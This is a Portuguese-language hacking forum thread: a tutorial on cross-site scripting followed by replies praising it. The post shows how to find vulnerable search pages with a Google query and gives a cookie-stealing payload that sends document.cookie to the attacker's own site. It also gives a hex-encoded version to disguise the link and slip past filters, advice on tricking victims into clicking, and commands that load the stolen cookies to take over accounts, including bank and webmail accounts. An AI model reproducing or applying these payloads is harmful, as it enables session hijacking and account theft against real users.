Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

XSS - (Cross Site Scripting) Guia Definitivo

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial XSS - (Cross Site Scripting) Guia Definitivo

    XSS – (Cross Site Scripting) Guia Definitivo

    Bom, esses dias andei pesquisando no Fórum sobre XSS, porém encontrei pouco material sobre esse assunto, então decidi fazer este tópico, tentando ser o mais objetivo possível, juntei várias matérias, e coloquei um pouco do meu dedo no meio. OBS: Fontes no fim da página!

    Vamos lá:


    Introdução

    XSS (Cross Site Scripting) É uma falha muito conhecida e utilizada por hackers para obter vantagens em um sistema baseado em Web. Mesmo esta técnica já sendo de conhecimento geral, uma boa parte dos sistemas ainda está sujeito à falhas desse gênero.

    XSS é uma técnica utilizada para roubar sessões (cookies) em uma aplicação web. Ela consiste na injeção de tags html e comandos Java script em alguma função de um sistema, sendo assim tornando possível obter sessões de outros usuários sem a necessidade de se ter autorização para tal. Em outras palavras: Seria possível entrar em um webmail, fórum, livro de visitas e até mesmo um banco on-line sem a necessidade de se saber a senha do alvo. Esta técnica oferece alto risco a um usuário alvo tendo em vista que informações sensíveis poderão ser descobertas caso a falha exista.



    Encontrando vulnerabilidades XSS

    Para encontrar vulnerabilidades XSS, devemos iniciar procurando em Blogs, Fóruns, Caixas de texto para mensagens, comentários, busca, e etc; há muitas possibilidades onde podemos encontrar esse tipo de campo, no qual podemos entrar com dados.
    Podemos utilizar o Google para facilitar nossa busca. Por exemplo, se digitarmos no campo de busca do Google a linha inurl:"search.php?q=" teremos como retorno um número imenso de resultados encontrados, para encontrarmos alguns alvos para o ataque.



    Básico do XSS

    Vamos começar a aprender agora alguma coisa dos métodos XSS utilizados atualmente e o tipo de XSS Injection mais utilizado é:
    Código:
    <script>alert("XSS")</script>
    Esse código fará com que uma caixa de mensagem de alerta, com "XSS" escrito nela, apareça na tela.
    Código:
    <script>alert(document.cookie)</script>
    Esse código retorna o cookie atual da sessão aberta.

    Então, retornando ao tópico anterior, vamos lembrar que uma das páginas, contidas em websites, que mais facilmente podemos encontrar é o search.php?q= . Depois de encontrado um site com esse tipo de página, vamos simplesmente tentar o seguinte: digite após o sinal de = o código <script>alert("XSS")</script>
    A URL na barra de endereço do browser ficará assim:
    Código:
    http://site.com/search.php?q=<script>alert("XSS")</script>
    Há grandes chances de esse método funcionar, mas não se preocupe se isso não ocorrer.

    Apenas tente em outro site, ou leia este tutorial para burlar os filtros de XSS:




    Explorando as Vulnerabilidades

    Ok descobrimos que o site está vulnerável a XSS, mas mostrar apenas uma mensagem na tela não vai adiantar muita coisa.. Vejamos abaixo um script malicioso para roubar cookies dos usuários e até mesmo do administrador do site.
    Código:
    <script>document.location=("http://seusite.com.br/cookies.php?c=")+document.cookie</script>
    O script acima tem como objetivo enviar o cookie da sessão atual do usuário alvo, via parâmetro para o arquivo “cookies.php”.

    OBS.: O arquivo "cookies.php" estarei disponibilizando para download no fim do tópico!

    Inserindo o script acima em nossa url vulnerável, ficaria assim:
    Código:
    http://site.com/search.php?q=<script>document.location=("http://seusite.com.br/cookies.php?c=")+document.cookie</script>
    Pronto, dessa maneira podemos já obter os cookies dos nossos alvos, porém, uma URL dessa maneira faz com que o usuário pense duas vezes antes de acessá-lo, podemos mascarar esse
    script, transformando-o no seguinte aspecto:
    Código:
    http://site.com/search.php?q=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%28%22%68%74%74%70%3A%2F%2F%73%65%75%73%69%74%65%2E%63%6F%6D%2E%62%72%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%3D%22%29%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
    Site para codificação acima: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    O aspecto acima além de disfarçar um pouco e ser mais atraente, é capaz de burlar filtros XSS, veja o tutorial que citei anteriormente, é de extrema importância que tenha entendido como burlar os filtros de XSS, se não você pode acabar ficando pelo meio do caminho.

    Tutorial: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    O que fazer com os cookies?

    Após usar um pouco da sua engenharia social e fazer com que alguns usuários clicassem na URL maliciosa, ao acessar o seu site onde foi hospedado o arquivo “cookies.php”, você irá observar que foi criado um novo arquivo chamado “cookies.html” contendo algumas informações da vítima, observe a imagem abaixo:



    Agora basta executar o comando: javascript:void(document.cookie="") no seu navegador, para alterar o seu cookie, transformando-o para os cookies que você conseguiu obter. Exemplo utilizando a imagem acima:
    Código:
    javascript:void(document.cookie="tp_login=teste@gmail.com")
    javascript:void(document.cookie="tp_senha=ec056fc60a448d322f67bf75cb09a16f")
    OBS.: Para cada ponto e virgula “ ; “ você deve executar um novo script, a seguinte maneira não irá funcionar:
    Código:
    javascript:void(document.cookie="tp_login=teste@gmail.com; tp_senha=ec056fc60a448d322f67bf75cb09a16f")
    Feito isso, basta você dar um Refresh “F5” e vualá, você estará logado na conta da sua vítima. Caso não funcione, copie todo o cookie, lembrando que para cada ponto e vírgula você deve executar um novo script!



    Considerações Finais

    Bom, creio que com isso vocês já tenham uma base boa para aprimorarem suas técnicas, não existe somente essa forma de XSS que citei, a de roubar cookies, com XSS você pode criar formulários em uma página vulnerável, e conseguir informações pessoais, que estão além das contidas em um simples cookie. Basta usar sua imaginação, pois isso é apenas o ponta pé inicial!


    TÓPICOS DO FÓRUM PARA ESTUDO:

    (O que fazer com os cookies do xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Ataques Cross-Site Scripting) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Burlando Filtros de XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Falha em HOTWORDS (XSS em Forums) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Defacer com XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Entenda XSS de uma vez por todas) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (o que é xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    DESTAQUES:

    (Vídeo aula sobre XSS, recomendo) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    (Pentest XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    FONTES:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Todos os tópicos que citei anteriormente contribuiram para este tópico, então vale salientar que os mesmos fazem parte da FONTE!


    DOWNLOAD:

    cookies.php: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Site FREE, ótimo para hospedagem de arquivos PHP.


    Espero que gostem, abraços!


    "Deus me enviou à terra com uma missão. Só Ele pode me deter, os homens nunca poderão."
    Similar Threads

  • Font Size
    #2
    Meus parabéns.
    Ficou excelente.
    Abraçao

    Vc é o autor do tutorial?




    "Antes de conseguir você tem que acreditar."

    Comment


    • Font Size
      #3
      Sou o autor sim rsrs, esqueci de colocar ;P
      mas as fontes dos materiais que lenvantei estão todas ai..
      abraços!


      "Deus me enviou à terra com uma missão. Só Ele pode me deter, os homens nunca poderão."

      Comment


      • Font Size
        #4
        Cara excelente. Belo material de estudo.
        Estarei testando
        Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
        sigpic

        Comment


        • Font Size
          #5
          parabens , só podia mudar a fonte (EU não gosto muito , fica ruim de ler )

          Comment


          • Font Size
            #6
            Cara, ficou bom pra caramba esse tutorial.


            --> Liberte-se você também <--

            Comment


            • Font Size
              #7
              XSS *-*

              Tutorial legal (:




              Comment


              • Font Size
                #8
                Muito bom esse tutorial, estava precisando saber sobre XSS mais não achava material completo..
                Vlw!

                Comment


                • Font Size
                  #9
                  oloco mano., um tuto melhor que o outro

                  Comment


                  • Font Size
                    #10
                    Um dos melhores tópicos em questão de organização.

                    Comment


                    • Font Size
                      #11
                      Mano Parabens TUdo explicadim


                      (x) Faculdade Sistema de Informação (2° Periodo)

                      Você é de Bocaiúva Mg ?? Me add ae ...

                      Comment


                      • Font Size
                        #12
                        FICOU OTIMO AMIGO, principalmente pq
                        2 Tutoriais ai são meus =D
                        Twitter: @samukt << Siga me ;D

                        Comment


                        • Font Size
                          #13
                          Postado Originalmente por samukt Ver Post
                          FICOU OTIMO AMIGO, principalmente pq
                          2 Tutoriais ai são meus =D
                          rsrsr ajudaram bastante na criação desse guia..
                          vlw pelos elogios pessoal!


                          "Deus me enviou à terra com uma missão. Só Ele pode me deter, os homens nunca poderão."

                          Comment

                          X
                          Working...
                          X